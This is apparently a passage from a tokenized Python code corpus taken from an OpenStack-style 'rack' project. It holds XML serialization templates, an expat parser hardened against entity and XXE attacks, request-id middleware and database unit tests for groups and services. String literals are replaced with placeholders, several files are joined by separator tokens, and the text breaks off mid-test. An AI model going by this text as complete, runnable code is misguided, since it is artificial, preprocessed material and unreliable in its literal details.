        """Return the representation of the constant."""
        return repr(self.value)

    def __call__(self, _obj, _do_raise=False):
        """Return the constant value."""
        return self.value


class TemplateElement(object):
    """One element of an XML serialization template."""

    def __init__(self, tag, attrib=None, selector=None, subselector=None,
                 colon_ns=False, **extra):
        """Initialize the element; non-callable selectors are wrapped."""
        if selector is None:
            selector = Selector()
        elif not callable(selector):
            selector = Selector(selector)
        if subselector is not None and not callable(subselector):
            subselector = Selector(subselector)
        self.tag = tag
        self.selector = selector
        self.subselector = subselector
        self.attrib = {}
        self._text = None
        self._children = []
        self._childmap = {}
        self.colon_ns = colon_ns
        if not attrib:
            attrib = {}
        attrib.update(extra)
        for k, v in attrib.items():
            self.set(k, v)

    def __repr__(self):
        """Return a debug representation including the tag."""
        return ('<STR_LIT>' %
                (self.__class__.__module__, self.__class__.__name__,
                 self.tag, id(self)))

    def __len__(self):
        """Return the number of child elements."""
        return len(self._children)

    def __contains__(self, key):
        """Return whether a child with the given tag exists."""
        return key in self._childmap

    def __getitem__(self, idx):
        """Index children by tag (string) or by position (int)."""
        if isinstance(idx, six.string_types):
            return self._childmap[idx]
        else:
            return self._children[idx]

    def append(self, elem):
        """Append a child element; duplicate tags raise KeyError."""
        elem = elem.unwrap()
        if elem.tag in self._childmap:
            raise KeyError(elem.tag)
        self._children.append(elem)
        self._childmap[elem.tag] = elem

    def extend(self, elems):
        """Append several children atomically; checks tags before adding."""
        # Validate into temporaries first so a duplicate leaves the
        # element unmodified.
        elemmap = {}
        elemlist = []
        for elem in elems:
            elem = elem.unwrap()
            if elem.tag in self._childmap or elem.tag in elemmap:
                raise KeyError(elem.tag)
            elemmap[elem.tag] = elem
            elemlist.append(elem)
        self._children.extend(elemlist)
        self._childmap.update(elemmap)

    def insert(self, idx, elem):
        """Insert a child at a position; duplicate tags raise KeyError."""
        elem = elem.unwrap()
        if elem.tag in self._childmap:
            raise KeyError(elem.tag)
        self._children.insert(idx, elem)
        self._childmap[elem.tag] = elem

    def remove(self, elem):
        """Remove a child element; raises ValueError if it is not a child."""
        elem = elem.unwrap()
        if elem.tag not in self._childmap or self._childmap[elem.tag] != elem:
            raise ValueError(_('<STR_LIT>'))
        self._children.remove(elem)
        del self._childmap[elem.tag]

    def get(self, key):
        """Return the attribute selector stored under *key*."""
        return self.attrib[key]

    def set(self, key, value=None):
        """Set an attribute selector; plain values are wrapped in Selector."""
        if value is None:
            value = Selector(key)
        elif not callable(value):
            value = Selector(value)
        self.attrib[key] = value

    def keys(self):
        """Return the attribute names."""
        return self.attrib.keys()

    def items(self):
        """Return (name, selector) pairs for the attributes."""
        return self.attrib.items()

    def unwrap(self):
        """Return self; symmetry with Template.unwrap()."""
        return self

    def wrap(self):
        """Wrap this element in a Template."""
        return Template(self)

    def apply(self, elem, obj):
        """Set text and attributes on the etree element from *obj*.

        BUGFIX: use six.text_type instead of the Python-2-only builtin
        `unicode` (the module already imports six).
        """
        if self.text is not None:
            elem.text = six.text_type(self.text(obj))
        for key, value in self.attrib.items():
            try:
                elem.set(key, six.text_type(value(obj, True)))
            except KeyError:
                # Selector missed; simply omit the attribute.
                pass

    def _render(self, parent, datum, patches, nsmap):
        """Create the etree element for one datum and apply patches."""
        if callable(self.tag):
            tagname = self.tag(datum)
        else:
            tagname = self.tag
        # Optional "prefix:name" handling via a synthetic namespace map.
        if self.colon_ns:
            if '<STR_LIT::>' in tagname:
                if nsmap is None:
                    nsmap = {}
                colon_key, colon_name = tagname.split('<STR_LIT::>')
                nsmap[colon_key] = colon_key
                tagname = '<STR_LIT>' % (colon_key, colon_name)
        elem = etree.Element(tagname, nsmap=nsmap)
        if parent is not None:
            parent.append(elem)
        if datum is None:
            return elem
        self.apply(elem, datum)
        for patch in patches:
            patch.apply(elem, datum)
        return elem

    def render(self, parent, obj, patches=None, nsmap=None):
        """Render this element for *obj*, returning (element, datum) pairs.

        BUGFIX: *patches* previously defaulted to a shared mutable list;
        `None` is now the default (behavior unchanged for callers).
        """
        if patches is None:
            patches = []
        data = None if obj is None else self.selector(obj)
        if not self.will_render(data):
            return []
        elif data is None:
            return [(self._render(parent, None, patches, nsmap), None)]
        if not isinstance(data, list):
            data = [data]
        elif parent is None:
            # A list at the root cannot be represented as a single element.
            raise ValueError(_('<STR_LIT>'))
        elems = []
        for datum in data:
            if self.subselector is not None:
                datum = self.subselector(datum)
            elems.append((self._render(parent, datum, patches, nsmap), datum))
        return elems

    def will_render(self, datum):
        """Return whether this element should be rendered for *datum*."""
        return datum is not None

    def _text_get(self):
        """Return the text selector."""
        return self._text

    def _text_set(self, value):
        # Wrap plain values so text is always produced via a selector.
        if value is not None and not callable(value):
            value = Selector(value)
        self._text = value

    def _text_del(self):
        self._text = None

    text = property(_text_get, _text_set, _text_del)

    def tree(self):
        """Return a string dump of the template tree for debugging."""
        contents = [self.tag, '<STR_LIT>' % self.selector]
        if self.text is not None:
            contents.append('<STR_LIT>' % self.text)
        for key, value in self.attrib.items():
            contents.append('<STR_LIT>' % (key, value))
        if len(self) == 0:
            return '<STR_LIT>' % '<STR_LIT:U+0020>'.join([str(i) for i in contents])
        children = [c.tree() for c in self]
        return ('<STR_LIT>' %
                ('<STR_LIT:U+0020>'.join(contents), '<STR_LIT>'.join(children), self.tag))


def SubTemplateElement(parent, tag, attrib=None, selector=None,
                       subselector=None, colon_ns=False, **extra):
    """Create a TemplateElement and attach it to *parent* (if given)."""
    attrib = attrib or {}
    attrib.update(extra)
    elem = TemplateElement(tag, attrib=attrib, selector=selector,
                           subselector=subselector, colon_ns=colon_ns)
    if parent is not None:
        parent.append(elem)
    return elem


class Template(object):
    """An XML serialization template wrapping a root TemplateElement."""

    def __init__(self, root, nsmap=None):
        """Store the unwrapped root and default serialization options."""
        self.root = root.unwrap() if root is not None else None
        self.nsmap = nsmap or {}
        self.serialize_options = dict(encoding='<STR_LIT>',
                                      xml_declaration=True)

    def _serialize(self, parent, obj, siblings, nsmap=None):
        """Recursively render *obj* using the first sibling plus patches."""
        elems = siblings[0].render(parent, obj, siblings[1:], nsmap)
        seen = set()
        for idx, sibling in enumerate(siblings):
            for child in sibling:
                if child.tag in seen:
                    continue
                seen.add(child.tag)
                # Collect same-tag children from the later siblings as
                # "nieces" to be rendered as patches.
                nieces = [child]
                for sib in siblings[idx + 1:]:
                    if child.tag in sib:
                        nieces.append(sib[child.tag])
                for elem, datum in elems:
                    self._serialize(elem, datum, nieces)
        if elems:
            return elems[0][0]

    def serialize(self, obj, *args, **kwargs):
        """Serialize *obj* to an XML string."""
        elem = self.make_tree(obj)
        if elem is None:
            return '<STR_LIT>'
        for k, v in self.serialize_options.items():
            kwargs.setdefault(k, v)
        return etree.tostring(elem, *args, **kwargs)

    def make_tree(self, obj):
        """Render *obj* into an etree element tree (or None)."""
        if self.root is None:
            return None
        siblings = self._siblings()
        nsmap = self._nsmap()
        return self._serialize(None, obj, siblings, nsmap)

    def _siblings(self):
        """Return the sibling roots; a plain template has only its own."""
        return [self.root]

    def _nsmap(self):
        """Return a copy of the namespace map."""
        return self.nsmap.copy()

    def unwrap(self):
        """Return the root TemplateElement."""
        return self.root

    def wrap(self):
        """Return self; symmetry with TemplateElement.wrap()."""
        return self

    def apply(self, master):
        """Return whether this template applies to *master*."""
        return True

    def tree(self):
        """Return a string dump of the template for debugging."""
        return "<STR_LIT>" % (self, self.root.tree())


class MasterTemplate(Template):
    """A versioned template that slave templates can be attached to."""

    def __init__(self, root, version, nsmap=None):
        """Store the root, version and an empty slave list."""
        super(MasterTemplate, self).__init__(root, nsmap)
        self.version = version
        self.slaves = []

    def __repr__(self):
        """Return a debug representation including the version."""
        return ("<STR_LIT>" %
                (self.__class__.__module__, self.__class__.__name__,
                 self.version, id(self)))

    def _siblings(self):
        """Return the master root followed by all slave roots."""
        return [self.root] + [slave.root for slave in self.slaves]

    def _nsmap(self):
        """Return the master nsmap merged with every slave's nsmap."""
        nsmap = self.nsmap.copy()
        for slave in self.slaves:
            nsmap.update(slave._nsmap())
        return nsmap

    def attach(self, *slaves):
        """Attach slave templates whose root tag and version both match."""
        slave_list = []
        for slave in slaves:
            slave = slave.wrap()
            if slave.root.tag != self.root.tag:
                msg = _("<STR_LIT>"
                        "<STR_LIT>") % {'<STR_LIT>': slave.root.tag,
                                        '<STR_LIT>': self.root.tag}
                raise ValueError(msg)
            # Version-incompatible slaves are silently skipped.
            if not slave.apply(self):
                continue
            slave_list.append(slave)
        self.slaves.extend(slave_list)

    def copy(self):
        """Return a shallow copy sharing roots but with its own slave list."""
        tmp = self.__class__(self.root, self.version, self.nsmap)
        tmp.slaves = self.slaves[:]
        return tmp


class SlaveTemplate(Template):
    """A template that applies only within a master-version range."""

    def __init__(self, root, min_vers, max_vers=None, nsmap=None):
        """Store the root and the applicable version range."""
        super(SlaveTemplate, self).__init__(root, nsmap)
        self.min_vers = min_vers
        self.max_vers = max_vers

    def __repr__(self):
        """Return a debug representation including the version range."""
        return ("<STR_LIT>" %
                (self.__class__.__module__, self.__class__.__name__,
                 self.min_vers, self.max_vers, id(self)))

    def apply(self, master):
        """Return whether the master's version falls inside our range."""
        if master.version < self.min_vers:
            return False
        if self.max_vers is not None and master.version > self.max_vers:
            return False
        return True


class TemplateBuilder(object):
    """Builds and caches a template per subclass via construct()."""

    _tmpl = None

    def __new__(cls, copy=True):
        """Return the cached template, building it on first use.

        NOTE: the cache lives on the subclass, so each builder class
        constructs its template exactly once.
        """
        if cls._tmpl is None:
            tmp = super(TemplateBuilder, cls).__new__(cls)
            cls._tmpl = tmp.construct()
        if copy and hasattr(cls._tmpl, '<STR_LIT>'):
            return cls._tmpl.copy()
        return cls._tmpl

    def construct(self):
        """Build the template; subclasses must override."""
        raise NotImplementedError(_("<STR_LIT>"))


def make_links(parent, selector=None):
    """Attach a standard Atom link sub-element template to *parent*."""
    elem = SubTemplateElement(parent, '<STR_LIT>' % XMLNS_ATOM,
                              selector=selector)
    elem.set('<STR_LIT>')
    elem.set('<STR_LIT:type>')
    elem.set('<STR_LIT>')
    return elem


def make_flat_dict(name, selector=None, subselector=None,
                   ns=None, colon_ns=False, root=None,
                   ignore_sub_dicts=False):
    """Build a template rendering a flat dict as one element per key."""
    if ns is None:
        elemname = name
        tagname = Selector(0)
    else:
        elemname = '<STR_LIT>' % (ns, name)
        tagname = lambda obj, do_raise=False: '<STR_LIT>' % (ns, obj[0])
    if selector is None:
        selector = name
    if not root:
        root = TemplateElement(elemname, selector=selector,
                               subselector=subselector, colon_ns=colon_ns)
    # Optionally skip dict-valued entries (they are not flat).
    choice = get_items if ignore_sub_dicts is False else get_items_without_dict
    elem = SubTemplateElement(root, tagname, selector=choice,
                              colon_ns=colon_ns)
    # Each item is a (key, value) pair; index 1 selects the value as text.
    elem.text = 1
    return root


class ProtectedExpatParser(expatreader.ExpatParser):
    """Expat parser that rejects DTDs and entity declarations.

    Defends against entity-expansion and external-entity (XXE) attacks
    by raising ValueError from the relevant expat handlers.
    """

    def __init__(self, forbid_dtd=True, forbid_entities=True,
                 *args, **kwargs):
        """Store the protection flags and initialize the base parser."""
        expatreader.ExpatParser.__init__(self, *args, **kwargs)
        self.forbid_dtd = forbid_dtd
        self.forbid_entities = forbid_entities

    def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
        raise ValueError("<STR_LIT>")

    def entity_decl(self, entityName, is_parameter_entity, value, base,
                    systemId, publicId, notationName):
        raise ValueError("<STR_LIT>")

    def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
        raise ValueError("<STR_LIT>")

    def external_entity_ref(self, context, base, systemId, publicId):
        raise ValueError("<STR_LIT>")

    def notation_decl(self, name, base, sysid, pubid):
        raise ValueError("<STR_LIT>")

    def reset(self):
        """Install the forbidding handlers on the underlying expat parser."""
        expatreader.ExpatParser.reset(self)
        if self.forbid_dtd:
            self._parser.StartDoctypeDeclHandler = self.start_doctype_decl
            self._parser.EndDoctypeDeclHandler = None
        if self.forbid_entities:
            self._parser.EntityDeclHandler = self.entity_decl
            self._parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
            self._parser.ExternalEntityRefHandler = self.external_entity_ref
            self._parser.NotationDeclHandler = self.notation_decl
            try:
                self._parser.SkippedEntityHandler = None
            except AttributeError:
                # Handler not available on some expat versions.
                pass


def safe_minidom_parse_string(xml_string):
    """Parse *xml_string* with minidom using the protected expat parser.

    Raises MalformedRequestBody on any parse/protection failure.
    """
    try:
        return minidom.parseString(xml_string, parser=ProtectedExpatParser())
    except (sax.SAXParseException, ValueError,
            expat.ExpatError, LookupError) as e:
        raise exception.MalformedRequestBody(reason=str(e))
<s> import inspect <EOL> class MissingArgs ( Exception ) : <EOL> def __init__ ( self , missing ) : <EOL> self . missing = missing <EOL> def __str__ ( self ) : <EOL> if len ( self . missing ) == <NUM_LIT:1> : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return ( "<STR_LIT>" % <EOL> dict ( num = len ( self . missing ) ) ) <EOL> def validate_args ( fn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> argspec = inspect . getargspec ( fn ) <EOL> num_defaults = len ( argspec . defaults or [ ] ) <EOL> required_args = argspec . args [ : len ( argspec . args ) - num_defaults ] <EOL> def isbound ( method ) : <EOL> return getattr ( method , '<STR_LIT>' , None ) is not None <EOL> if isbound ( fn ) : <EOL> required_args . pop ( <NUM_LIT:0> ) <EOL> missing = [ arg for arg in required_args if arg not in kwargs ] <EOL> missing = missing [ len ( args ) : ] <EOL> if missing : <EOL> raise MissingArgs ( missing ) </s>
<s> """<STR_LIT>""" <EOL> from rack . openstack . common import context <EOL> from rack . openstack . common . middleware import base <EOL> ENV_REQUEST_ID = '<STR_LIT>' <EOL> HTTP_RESP_HEADER_REQUEST_ID = '<STR_LIT>' <EOL> class RequestIdMiddleware ( base . Middleware ) : <EOL> def process_request ( self , req ) : <EOL> self . req_id = context . generate_request_id ( ) <EOL> req . environ [ ENV_REQUEST_ID ] = self . req_id <EOL> def process_response ( self , response ) : <EOL> response . headers . add ( HTTP_RESP_HEADER_REQUEST_ID , self . req_id ) <EOL> return response </s>
<s> """<STR_LIT>""" <EOL> import collections as col <EOL> import copy <EOL> import xml . etree . ElementTree as ET <EOL> import six <EOL> import rack . openstack . common . report . utils as utils <EOL> class KeyValueView ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapper_name = "<STR_LIT>" ) : <EOL> self . wrapper_name = wrapper_name <EOL> def __call__ ( self , model ) : <EOL> cpy = copy . deepcopy ( model ) <EOL> for key , valstr in model . items ( ) : <EOL> if getattr ( valstr , '<STR_LIT>' , False ) : <EOL> cpy [ key ] = ET . fromstring ( valstr ) <EOL> def serialize ( rootmodel , rootkeyname ) : <EOL> res = ET . Element ( rootkeyname ) <EOL> if isinstance ( rootmodel , col . Mapping ) : <EOL> for key in rootmodel : <EOL> res . append ( serialize ( rootmodel [ key ] , key ) ) <EOL> elif ( isinstance ( rootmodel , col . Sequence ) <EOL> and not isinstance ( rootmodel , six . string_types ) ) : <EOL> for val in rootmodel : <EOL> res . append ( serialize ( val , '<STR_LIT>' ) ) <EOL> elif ET . iselement ( rootmodel ) : <EOL> res . append ( rootmodel ) <EOL> else : <EOL> res . text = str ( rootmodel ) <EOL> return res <EOL> res = utils . StringWithAttrs ( ET . tostring ( serialize ( cpy , <EOL> self . wrapper_name ) ) ) <EOL> res . __is_xml__ = True <EOL> return res </s>
<s> from rack import context <EOL> from rack import db <EOL> from rack import exception <EOL> from rack import test <EOL> import uuid <EOL> class ModelsObjectComparatorMixin ( object ) : <EOL> def _dict_from_object ( self , obj , ignored_keys ) : <EOL> if ignored_keys is None : <EOL> ignored_keys = [ ] <EOL> return dict ( [ ( k , v ) for k , v in obj . iteritems ( ) <EOL> if k not in ignored_keys ] ) <EOL> def _assertEqualObjects ( self , obj1 , obj2 , ignored_keys = None ) : <EOL> obj1 = self . _dict_from_object ( obj1 , ignored_keys ) <EOL> obj2 = self . _dict_from_object ( obj2 , ignored_keys ) <EOL> self . assertEqual ( len ( obj1 ) , <EOL> len ( obj2 ) , <EOL> "<STR_LIT>" % <EOL> str ( set ( obj1 . keys ( ) ) ^ set ( obj2 . keys ( ) ) ) ) <EOL> for key , value in obj1 . iteritems ( ) : <EOL> self . assertEqual ( value , obj2 [ key ] ) <EOL> def _assertEqualListsOfObjects ( self , objs1 , objs2 , ignored_keys = None ) : <EOL> obj_to_dict = lambda o : self . _dict_from_object ( o , ignored_keys ) <EOL> sort_key = lambda d : [ d [ k ] for k in sorted ( d ) ] <EOL> conv_and_sort = lambda obj : sorted ( map ( obj_to_dict , obj ) , <EOL> key = sort_key ) <EOL> self . assertEqual ( conv_and_sort ( objs1 ) , conv_and_sort ( objs2 ) ) <EOL> def _assertEqualOrderedListOfObjects ( self , objs1 , objs2 , <EOL> ignored_keys = None ) : <EOL> obj_to_dict = lambda o : self . _dict_from_object ( o , ignored_keys ) <EOL> conv = lambda obj : map ( obj_to_dict , obj ) <EOL> self . assertEqual ( conv ( objs1 ) , conv ( objs2 ) ) <EOL> def _assertEqualListsOfPrimitivesAsSets ( self , primitives1 , primitives2 ) : <EOL> self . assertEqual ( len ( primitives1 ) , len ( primitives2 ) ) <EOL> for primitive in primitives1 : <EOL> self . assertIn ( primitive , primitives2 ) <EOL> for primitive in primitives2 : <EOL> self . assertIn ( primitive , primitives1 ) <EOL> class GroupTestCase ( test . 
TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( GroupTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> def test_group_get_all ( self ) : <EOL> groups = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> ] <EOL> user_ids = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> created_groups_list = [ ] <EOL> for user_id in user_ids : <EOL> created_groups = [ self . _create_group ( group , user_id = user_id , <EOL> project_id = user_id ) <EOL> for group in groups ] <EOL> created_groups_list . append ( created_groups ) <EOL> ctext = context . RequestContext ( <EOL> user_id = user_ids [ <NUM_LIT:0> ] , project_id = user_ids [ <NUM_LIT:0> ] ) <EOL> res_groups = db . group_get_all ( ctext ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_groups ) , len ( created_groups_list [ <NUM_LIT:0> ] ) ) <EOL> for group in range ( <NUM_LIT:0> , len ( res_groups ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_groups [ group ] , created_groups_list [ <NUM_LIT:0> ] [ group ] , <EOL> ignored_keys ) <EOL> def test_group_get_all_empty ( self ) : <EOL> ctext = context . RequestContext ( <EOL> user_id = "<STR_LIT>" , project_id = "<STR_LIT>" ) <EOL> res_groups = db . group_get_all ( ctext ) <EOL> expected = [ ] <EOL> self . 
assertEqual ( res_groups , expected ) <EOL> def test_group_get_by_gid ( self ) : <EOL> groups = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> ] <EOL> user_id = "<STR_LIT>" <EOL> created_groups = [ self . _create_group ( <EOL> group , user_id = user_id , project_id = user_id ) for group in groups ] <EOL> gid = created_groups [ <NUM_LIT:1> ] [ "<STR_LIT>" ] <EOL> ctext = context . RequestContext ( <EOL> user_id = user_id , project_id = user_id ) <EOL> res_group = db . group_get_by_gid ( ctext , gid ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_group , created_groups [ <NUM_LIT:1> ] , ignored_keys ) <EOL> def test_group_get_by_gid_not_found ( self ) : <EOL> user_id = "<STR_LIT>" <EOL> ctext = context . RequestContext ( <EOL> user_id = user_id , project_id = user_id ) <EOL> gid = "<STR_LIT>" <EOL> status_code = <NUM_LIT:200> <EOL> try : <EOL> db . group_get_by_gid ( ctext , gid ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } <EOL> def _create_group ( self , values , user_id = None , project_id = None ) : <EOL> user_ctxt = context . RequestContext ( user_id , project_id ) <EOL> values [ '<STR_LIT>' ] = unicode ( uuid . uuid4 ( ) ) <EOL> values [ '<STR_LIT>' ] = user_id <EOL> values [ '<STR_LIT>' ] = project_id <EOL> v = self . _get_base_values ( ) <EOL> v . 
update ( values ) <EOL> return db . group_create ( user_ctxt , v ) <EOL> def test_group_create ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group = db . group_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> values . update ( { "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" } ) <EOL> self . assertIsNotNone ( group [ '<STR_LIT>' ] ) <EOL> self . _assertEqualObjects ( group , values , ignored_keys ) <EOL> def test_group_update ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group_before = db . group_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : group_before [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> group = db . group_update ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:status>" ] <EOL> self . _assertEqualObjects ( group , values , ignored_keys ) <EOL> def test_group_delete ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> db . group_create ( self . user_ctxt , values_before ) <EOL> deleted_group = db . group_delete ( self . ctxt , self . gid ) <EOL> self . 
assertEqual ( deleted_group [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( deleted_group [ "<STR_LIT:status>" ] , "<STR_LIT>" ) <EOL> self . assertIsNotNone ( deleted_group . get ( "<STR_LIT>" ) ) <EOL> def test_group_update_gid_not_found ( self ) : <EOL> values_before = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" <EOL> } <EOL> group_before = db . group_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : group_before [ "<STR_LIT>" ] + "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> try : <EOL> db . group_update ( self . user_ctxt , values ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_group_delete_not_found ( self ) : <EOL> self . assertRaises ( exception . GroupNotFound , <EOL> db . group_delete , <EOL> context = self . user_ctxt , <EOL> gid = self . gid ) <EOL> class ServiceTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( ServiceTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def _create_service ( self , values ) : <EOL> v = self . _get_base_values ( ) <EOL> v . update ( values ) <EOL> return db . service_create ( self . ctxt , v ) <EOL> def test_service_create ( self ) : <EOL> service = self . _create_service ( { } ) <EOL> self . assertIsNotNone ( service [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . _get_base_values ( ) . iteritems ( ) : <EOL> self . 
assertEqual ( value , service [ key ] ) <EOL> def test_service_destroy ( self ) : <EOL> service1 = self . _create_service ( { } ) <EOL> service2 = self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' } ) <EOL> db . service_destroy ( self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_get , self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . _assertEqualObjects ( db . service_get ( self . ctxt , service2 [ '<STR_LIT:id>' ] ) , <EOL> service2 ) <EOL> def test_service_update ( self ) : <EOL> service = self . _create_service ( { } ) <EOL> new_values = { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True <EOL> } <EOL> db . service_update ( self . ctxt , service [ '<STR_LIT:id>' ] , new_values ) <EOL> updated_service = db . service_get ( self . ctxt , service [ '<STR_LIT:id>' ] ) <EOL> for key , value in new_values . iteritems ( ) : <EOL> self . assertEqual ( value , updated_service [ key ] ) <EOL> def test_service_update_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_update , self . ctxt , <NUM_LIT> , { } ) <EOL> def test_service_get ( self ) : <EOL> service1 = self . _create_service ( { } ) <EOL> self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' } ) <EOL> real_service1 = db . service_get ( self . ctxt , service1 [ '<STR_LIT:id>' ] ) <EOL> self . _assertEqualObjects ( service1 , real_service1 , <EOL> ignored_keys = [ '<STR_LIT>' ] ) <EOL> def test_service_get_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . ServiceNotFound , <EOL> db . service_get , self . ctxt , <NUM_LIT> ) <EOL> def test_service_get_by_host_and_topic ( self ) : <EOL> service1 = self . _create_service ( { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . 
_create_service ( { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> real_service1 = db . service_get_by_host_and_topic ( self . ctxt , <EOL> host = '<STR_LIT>' , <EOL> topic = '<STR_LIT>' ) <EOL> self . _assertEqualObjects ( service1 , real_service1 ) <EOL> def test_service_get_all ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : True } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> disabled_services = [ services [ - <NUM_LIT:1> ] ] <EOL> non_disabled_services = services [ : - <NUM_LIT:1> ] <EOL> compares = [ <EOL> ( services , db . service_get_all ( self . ctxt ) ) , <EOL> ( disabled_services , db . service_get_all ( self . ctxt , True ) ) , <EOL> ( non_disabled_services , db . service_get_all ( self . ctxt , False ) ) <EOL> ] <EOL> for comp in compares : <EOL> self . _assertEqualListsOfObjects ( * comp ) <EOL> def test_service_get_all_by_topic ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : 